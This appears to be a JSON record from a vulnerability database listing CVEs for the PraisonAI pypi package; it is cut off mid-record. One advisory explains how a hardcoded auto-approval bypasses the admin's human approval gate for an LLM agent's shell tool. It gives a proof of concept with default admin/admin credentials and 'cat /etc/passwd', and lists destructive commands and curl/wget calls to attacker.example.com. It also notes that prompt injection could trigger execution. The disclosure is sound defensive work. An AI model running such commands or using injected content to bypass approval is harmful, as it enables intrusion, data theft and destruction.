{"url":"http://public2.vulnerablecode.io/api/packages/955547?format=json","purl":"pkg:pypi/praisonai@0.0.74","type":"pypi","namespace":"","name":"praisonai","version":"0.0.74","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"4.5.149","latest_non_vulnerable_version":"4.6.40","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331972?format=json","vulnerability_id":"VCID-1j3d-czu4-vbbu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40287","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10545","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40287"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:23:23Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40287","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40287"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188755?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-t82b-kttm-ukbq"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40287","GHSA-g985-wjh9-qxxc"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1j3d-czu4-vbbu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/346533?format=json","vulnerability_id":"VCID-42xt-269j-m3hw","summary":"PraisonAI: Hardcoded `approval_mode=\"auto\"` in Chainlit UI Overrides Administrator Configuration, Enabling Unapproved Shell Command Execution\n## Summary\n\nThe Chainlit UI modules (`chat.py` and `code.py`) hardcode `config.approval_mode = \"auto\"` after loading administrator configuration from the `PRAISON_APPROVAL_MODE` environment variable, silently overriding any \"manual\" or \"scoped\" approval setting. This defeats the human-in-the-loop approval gate for all ACP tool executions, including shell command execution via `subprocess.run(..., shell=True)`. An authenticated user can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt.\n\n## Details\n\nThe application has a well-designed approval framework supporting `auto`, `manual`, and `scoped` modes, configured via the `PRAISON_APPROVAL_MODE` environment variable and loaded by `ToolConfig.from_env()` at `interactive_tools.py:81-106`.\n\nHowever, both UI modules unconditionally override this after loading:\n\n**`chat.py:156-159`:**\n```python\nconfig = ToolConfig.from_env()       # reads PRAISON_APPROVAL_MODE=manual\nconfig.workspace = os.getcwd()\nconfig.approval_mode = \"auto\"        # hardcoded override, ignoring admin config\n```\n\n**`code.py:155-158`:**\n```python\nconfig = ToolConfig.from_env()\nconfig.workspace = os.environ.get(\"PRAISONAI_CODE_REPO_PATH\", os.getcwd())\nconfig.approval_mode = \"auto\"        # same hardcoded override\n```\n\nThis flows to `agent_tools.py:347-348` in the `acp_execute_command` function:\n```python\nauto_approve = runtime.config.approval_mode == \"auto\"   # always True\napproved = await orchestrator.approve_plan(plan, auto=auto_approve)\n```\n\nThe plan is auto-approved without user confirmation and reaches `action_orchestrator.py:458`:\n```python\nresult = subprocess.run(\n    step.target,\n    shell=True,           # shell execution\n    capture_output=True,\n    text=True,\n    cwd=str(workspace),\n    timeout=30\n)\n```\n\n**Command sanitization is insufficient.** Two blocklists exist:\n1. `_sanitize_command()` at `agent_tools.py:60-86` blocks: `$(`, `` ` ``, `&&`, `||`, `>>`, `>`, `|`, `;`, `&`, `\\n`, `\\r`\n2. `_apply_step()` at `action_orchestrator.py:449` blocks: `;`, `&`, `|`, `$`, `` ` ``\n\nBoth only target command chaining/substitution operators. Single-argument destructive commands pass both blocklists: `rm -rf /home`, `curl http://attacker.example.com/exfil`, `wget`, `chmod 777 /etc/shadow`, `python3 -c \"import os; os.unlink('/important')\"`, `dd if=/dev/zero of=/dev/sda`.\n\n## PoC\n\n**Prerequisites:** PraisonAI UI running (`praisonai ui chat` or `praisonai ui code`). Default credentials not changed.\n\n```bash\n# Step 1: Start the Chainlit UI\npraisonai ui chat\n\n# Step 2: Log in with default credentials at http://localhost:8000\n# Username: admin\n# Password: admin\n\n# Step 3: Send a chat message requesting command execution:\n# \"Please run this command for me: cat /etc/passwd\"\n\n# The LLM agent calls acp_execute_command(\"cat /etc/passwd\")\n# _sanitize_command passes (no blocked patterns)\n# approval_mode=\"auto\" → auto-approved at agent_tools.py:347-348\n# subprocess.run(\"cat /etc/passwd\", shell=True) executes at action_orchestrator.py:458\n# Contents of /etc/passwd returned in chat\n\n# Step 4: Demonstrate the override of admin configuration:\n# Even with PRAISON_APPROVAL_MODE=manual set in the environment,\n# chat.py:159 overwrites it to \"auto\"\nexport PRAISON_APPROVAL_MODE=manual\npraisonai ui chat\n# Commands still auto-approve because of the hardcoded override\n```\n\n**Commands that bypass sanitization blocklists:**\n- `rm -rf /home/user/documents` — no blocked characters\n- `chmod 777 /etc/shadow` — no blocked characters  \n- `curl http://attacker.example.com/exfil` — no blocked characters\n- `wget http://attacker.example.com/backdoor -O /tmp/backdoor` — no blocked characters\n- `python3 -c \"__import__('os').unlink('/important/file')\"` — no blocked characters\n\n## Impact\n\n- **Arbitrary command execution:** An authenticated user (or attacker with default `admin/admin` credentials) can execute any single shell command on the server hosting PraisonAI, subject only to the OS-level permissions of the PraisonAI process.\n- **Confidentiality breach:** Read arbitrary files accessible to the process (`/etc/passwd`, application secrets, environment variables containing API keys).\n- **Integrity compromise:** Modify or delete files, install backdoors, tamper with application code.\n- **Availability impact:** Kill processes, consume disk/memory, delete critical data.\n- **Administrator control undermined:** Even administrators who explicitly set `PRAISON_APPROVAL_MODE=manual` to require human approval have their configuration silently overridden, creating a false sense of security.\n- **Prompt injection vector:** Since the agent also processes external content (web search results via Tavily, uploaded files), malicious content could trigger command execution through the auto-approved tool without direct user intent.\n\n## Recommended Fix\n\nRemove the hardcoded override and respect the administrator's configured approval mode. In both `chat.py` and `code.py`:\n\n```python\n# Before (chat.py:156-159):\nconfig = ToolConfig.from_env()\nconfig.workspace = os.getcwd()\nconfig.approval_mode = \"auto\"  # Trust mode - auto-approve all tool executions\n\n# After:\nconfig = ToolConfig.from_env()\nconfig.workspace = os.getcwd()\n# Respect PRAISON_APPROVAL_MODE from environment; defaults to \"auto\" in ToolConfig\n# Administrators can set PRAISON_APPROVAL_MODE=manual for human-in-the-loop approval\n```\n\nAdditionally, strengthen `_sanitize_command()` to use an allowlist approach rather than a blocklist:\n\n```python\nimport shlex\n\nALLOWED_COMMANDS = {\"ls\", \"cat\", \"head\", \"tail\", \"grep\", \"find\", \"echo\", \"pwd\", \"wc\", \"sort\", \"uniq\", \"diff\", \"git\", \"python\", \"pip\", \"node\", \"npm\"}\n\ndef _sanitize_command(command: str) -> str:\n    # Existing blocklist checks...\n    \n    # Additionally, check the base command against allowlist\n    try:\n        parts = shlex.split(command)\n    except ValueError:\n        raise ValueError(f\"Could not parse command: {command!r}\")\n    \n    base_cmd = os.path.basename(parts[0]) if parts else \"\"\n    if base_cmd not in ALLOWED_COMMANDS:\n        raise ValueError(\n            f\"Command {base_cmd!r} is not in the allowed command list. \"\n            f\"Allowed: {', '.join(sorted(ALLOWED_COMMANDS))}\"\n        )\n    \n    return command\n```","references":[{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm"},{"reference_url":"https://github.com/advisories/GHSA-qwgj-rrpj-75xm","reference_id":"GHSA-qwgj-rrpj-75xm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qwgj-rrpj-75xm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["GHSA-qwgj-rrpj-75xm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-42xt-269j-m3hw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330961?format=json","vulnerability_id":"VCID-5f3z-55fe-7kh7","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39889","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05711","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39889"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f292-66h9-fpmf","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:53:53Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f292-66h9-fpmf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39889","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39889"},{"reference_url":"https://github.com/advisories/GHSA-f292-66h9-fpmf","reference_id":"GHSA-f292-66h9-fpmf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f292-66h9-fpmf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188753?format=json","purl":"pkg:pypi/praisonai@4.5.115","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.115"}],"aliases":["CVE-2026-39889","GHSA-f292-66h9-fpmf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5f3z-55fe-7kh7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330963?format=json","vulnerability_id":"VCID-5x3f-r7ft-3ke4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39891","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06912","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39891"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.115"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-hwg5-x759-7wjg","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-09T13:49:06Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-hwg5-x759-7wjg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39891","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39891"},{"reference_url":"https://github.com/advisories/GHSA-hwg5-x759-7wjg","reference_id":"GHSA-hwg5-x759-7wjg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hwg5-x759-7wjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188753?format=json","purl":"pkg:pypi/praisonai@4.5.115","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-rymq-5dgd-t7g2"},{"vulnerability":"VCID-seay-h824-kug9"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-w65u-12gv-cud4"},{"vulnerability":"VCID-wuve-58em-sqas"},{"vulnerability":"VCID-xdc3-v772-zbf4"},{"vulnerability":"VCID-zmma-2kzw-7bc8"},{"vulnerability":"VCID-zwad-4gjg-e3e2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.115"}],"aliases":["CVE-2026-39891","GHSA-hwg5-x759-7wjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5x3f-r7ft-3ke4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331889?format=json","vulnerability_id":"VCID-78hn-811u-1fgg","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40159","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05295","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40159"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T14:48:28Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40159","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40159"},{"reference_url":"https://github.com/advisories/GHSA-pj2r-f9mw-vrcq","reference_id":"GHSA-pj2r-f9mw-vrcq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pj2r-f9mw-vrcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40159","GHSA-pj2r-f9mw-vrcq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-78hn-811u-1fgg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331881?format=json","vulnerability_id":"VCID-7fza-phhr-1ffb","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40151","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.18841","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40151"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:10:14Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40151","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40151"},{"reference_url":"https://github.com/advisories/GHSA-pm96-6xpr-978x","reference_id":"GHSA-pm96-6xpr-978x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pm96-6xpr-978x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188386?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-uemf-6s9q-4kar"},{"vulnerability":"VCID-xdc3-v772-zbf4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40151","GHSA-pm96-6xpr-978x"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7fza-phhr-1ffb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/329914?format=json","vulnerability_id":"VCID-9xhc-88h5-uya7","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34934","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09881","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34934"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-06T13:16:07Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34934","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34934"},{"reference_url":"https://github.com/advisories/GHSA-9cq8-3v94-434g","reference_id":"GHSA-9cq8-3v94-434g","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9cq8-3v94-434g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/189024?format=json","purl":"pkg:pypi/praisonai@4.5.90","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3d-czu4-vbbu"},{"vulnerability":"VCID-42xt-269j-m3hw"},{"vulnerability":"VCID-5f3z-55fe-7kh7"},{"vulnerability":"VCID-5x3f-r7ft-3ke4"},{"vulnerability":"VCID-78hn-811u-1fgg"},{"vulnerability":"VCID-7fza-phhr-1ffb"},{"vulnerability":"VCID-9bnf-71rn-77e9"},{"vulnerability":"VCID-as2k-h8e6-2bbg"},{"vulnerability":"VCID-b346-avpg-nqex"},{"vulnerability":"VCID-bm8e-na69-2qhr"},{"vulnerability":"VCID-ceav-utcz-33fc"},{"vulnerability":"VCID-e9s4-2q39-97bu"},{"vulnerability":"VCID-gtfg-wf6b-p7et"},{"vulnerability":"VCID-hby8-eypb-3ubk"},{"vulnerability":"VCID-k8kd-r72v-d7hd"},{"vulnerability":"VCID-kqsn-x28j-8bds"},{"vulnerability":"VCID-kz7y-x7tb-9qe8"},{"vulnerability":"VCID-m1vr-ksyx-ebh1"},{"vulnerability":"VCID-m23z-e1es-byhy"},{"vulnerability":"VCID-mker-659v-dfaa"},{"vulnerability":"VCID-mq2r-dw6g-77fx"},{"vulnerability":"VCID-mwe3-4jct-jqhk"},{"vulnerability":"VCID-qg8p-cewa-6khr"},{"vulnerability":"VCI